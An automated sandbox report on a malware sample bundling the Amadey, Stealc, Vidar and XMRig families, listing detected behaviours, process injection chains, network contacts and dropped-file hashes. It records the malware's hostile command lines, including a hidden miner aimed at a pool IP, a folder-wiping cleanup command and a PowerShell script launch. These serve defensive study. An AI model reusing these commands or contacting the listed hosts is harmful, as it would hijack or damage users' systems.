Malware Analysis Report

2024-09-11 16:08

Sample ID 240617-v887gsxfqd
Target files.zip
SHA256 6ba9d7cfc6378cdeeb2006a0cf9014c9a10bb3f1d480bebc435de97307868d7c
Tags
amadey stealc vidar xmrig ffb1b9 discovery execution miner spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6ba9d7cfc6378cdeeb2006a0cf9014c9a10bb3f1d480bebc435de97307868d7c

Threat Level: Known bad

The file files.zip was found to be: Known bad.

Malicious Activity Summary

amadey stealc vidar xmrig ffb1b9 discovery execution miner spyware stealer trojan upx

xmrig

Amadey

Detect Vidar Stealer

Stealc

Vidar

XMRig Miner payload

Blocklisted process makes network request

Reads data files stored by FTP clients

Reads user/profile data of web browsers

Reads user/profile data of local email clients

UPX packed file

Accesses cryptocurrency files/wallets, possible credential harvesting

Downloads MZ/PE file

Suspicious use of SetThreadContext

Checks computer location settings

Executes dropped EXE

Drops file in Windows directory

Checks installed software on the system

Loads dropped DLL

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies system certificate store

Delays execution with timeout.exe

Suspicious behavior: MapViewOfSection

Checks processor information in registry

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Modify Registry
T1112
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-17 17:40

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-17 17:40

Reported

2024-06-17 17:43

Platform

win10v2004-20240508-en

Max time kernel

114s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1692 set thread context of 2880 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1060 set thread context of 3712 N/A C:\ProgramData\AKECBFBAEB.exe C:\Windows\SysWOW64\ftp.exe
PID 4560 set thread context of 4376 N/A C:\ProgramData\AEHIDAKECF.exe C:\Windows\SysWOW64\ftp.exe
PID 4376 set thread context of 4556 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4556 set thread context of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\AKECBFBAEB.exe N/A
N/A N/A C:\ProgramData\AEHIDAKECF.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\ProgramData\AKECBFBAEB.exe N/A
N/A N/A C:\ProgramData\AKECBFBAEB.exe N/A
N/A N/A C:\ProgramData\AKECBFBAEB.exe N/A
N/A N/A C:\ProgramData\AEHIDAKECF.exe N/A
N/A N/A C:\ProgramData\AEHIDAKECF.exe N/A
N/A N/A C:\ProgramData\AEHIDAKECF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\ProgramData\AKECBFBAEB.exe N/A
N/A N/A C:\ProgramData\AEHIDAKECF.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1692 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1692 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1692 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1692 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2880 wrote to memory of 1412 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1412 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AKECBFBAEB.exe
PID 1412 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AKECBFBAEB.exe
PID 1412 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AKECBFBAEB.exe
PID 1060 wrote to memory of 3712 N/A C:\ProgramData\AKECBFBAEB.exe C:\Windows\SysWOW64\ftp.exe
PID 1060 wrote to memory of 3712 N/A C:\ProgramData\AKECBFBAEB.exe C:\Windows\SysWOW64\ftp.exe
PID 1060 wrote to memory of 3712 N/A C:\ProgramData\AKECBFBAEB.exe C:\Windows\SysWOW64\ftp.exe
PID 1412 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AEHIDAKECF.exe
PID 1412 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AEHIDAKECF.exe
PID 1412 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\AEHIDAKECF.exe
PID 4560 wrote to memory of 4376 N/A C:\ProgramData\AEHIDAKECF.exe C:\Windows\SysWOW64\ftp.exe
PID 4560 wrote to memory of 4376 N/A C:\ProgramData\AEHIDAKECF.exe C:\Windows\SysWOW64\ftp.exe
PID 4560 wrote to memory of 4376 N/A C:\ProgramData\AEHIDAKECF.exe C:\Windows\SysWOW64\ftp.exe
PID 1060 wrote to memory of 3712 N/A C:\ProgramData\AKECBFBAEB.exe C:\Windows\SysWOW64\ftp.exe
PID 4560 wrote to memory of 4376 N/A C:\ProgramData\AEHIDAKECF.exe C:\Windows\SysWOW64\ftp.exe
PID 1412 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 1412 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 1412 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 4608 wrote to memory of 4580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4608 wrote to memory of 4580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4608 wrote to memory of 4580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4376 wrote to memory of 4556 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4376 wrote to memory of 4556 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3712 wrote to memory of 1304 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3712 wrote to memory of 1304 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3712 wrote to memory of 1304 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4376 wrote to memory of 4556 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4376 wrote to memory of 4556 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3712 wrote to memory of 1304 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4556 wrote to memory of 4212 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1304 wrote to memory of 892 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1304 wrote to memory of 892 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1304 wrote to memory of 892 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4376,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=1424 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3080,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=2396 /prefetch:3

C:\ProgramData\AKECBFBAEB.exe

"C:\ProgramData\AKECBFBAEB.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\ProgramData\AEHIDAKECF.exe

"C:\ProgramData\AEHIDAKECF.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKKFIIEBKEGI" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 203.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 poocoin.online udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 41.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 18.53.55.162.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 172.67.212.123:443 businessdownloads.ltd tcp
US 8.8.8.8:53 123.212.67.172.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.192.193:443 i.imgur.com tcp
US 8.8.8.8:53 193.192.232.199.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
FI 135.181.22.88:80 135.181.22.88 tcp
US 8.8.8.8:53 88.22.181.135.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
US 8.8.8.8:53 proresupdate.com udp
US 45.152.112.146:80 proresupdate.com tcp
US 8.8.8.8:53 contur2fa.recipeupdates.rest udp
US 172.67.197.250:443 contur2fa.recipeupdates.rest tcp
US 8.8.8.8:53 146.112.152.45.in-addr.arpa udp
US 8.8.8.8:53 250.197.67.172.in-addr.arpa udp
US 172.67.197.250:443 contur2fa.recipeupdates.rest tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp

Files

memory/1692-0-0x0000000074760000-0x00000000748DB000-memory.dmp

memory/1692-1-0x00007FFEBB2B0000-0x00007FFEBB4A5000-memory.dmp

memory/1692-7-0x0000000074772000-0x0000000074774000-memory.dmp

memory/1692-8-0x0000000074760000-0x00000000748DB000-memory.dmp

memory/1692-9-0x0000000074760000-0x00000000748DB000-memory.dmp

memory/2880-11-0x0000000074761000-0x000000007476F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a68dcc38

MD5 17b9501ea8789548ed38716c0d398ff2
SHA1 553ea90372804ebec3d981f781cffb241969399e
SHA256 dac22e483357140ef3f044b7f22f3ece6f656cf9cdd429985ddfe4f1939c4c86
SHA512 423bffaef76abdf5b72b576b4994d176f54eca2a960ac422dd66536b33aae4d1e2c9f50cfa22b837549274306bc2f8dd91d24fd47ec975ae85452a21e28ac6ab

memory/2880-13-0x00007FFEBB2B0000-0x00007FFEBB4A5000-memory.dmp

memory/2880-16-0x0000000074761000-0x000000007476F000-memory.dmp

memory/2880-15-0x000000007476E000-0x0000000074770000-memory.dmp

memory/2880-20-0x0000000074761000-0x000000007476F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/1412-22-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/1412-24-0x00007FFEBB2B0000-0x00007FFEBB4A5000-memory.dmp

memory/1412-36-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/1412-62-0x0000000001400000-0x0000000001B4C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\ProgramData\JKKFIIEBKEGI\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\JKKFIIEBKEGI\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\AKECBFBAEB.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/1060-130-0x0000000000080000-0x0000000000593000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\84713c1f

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
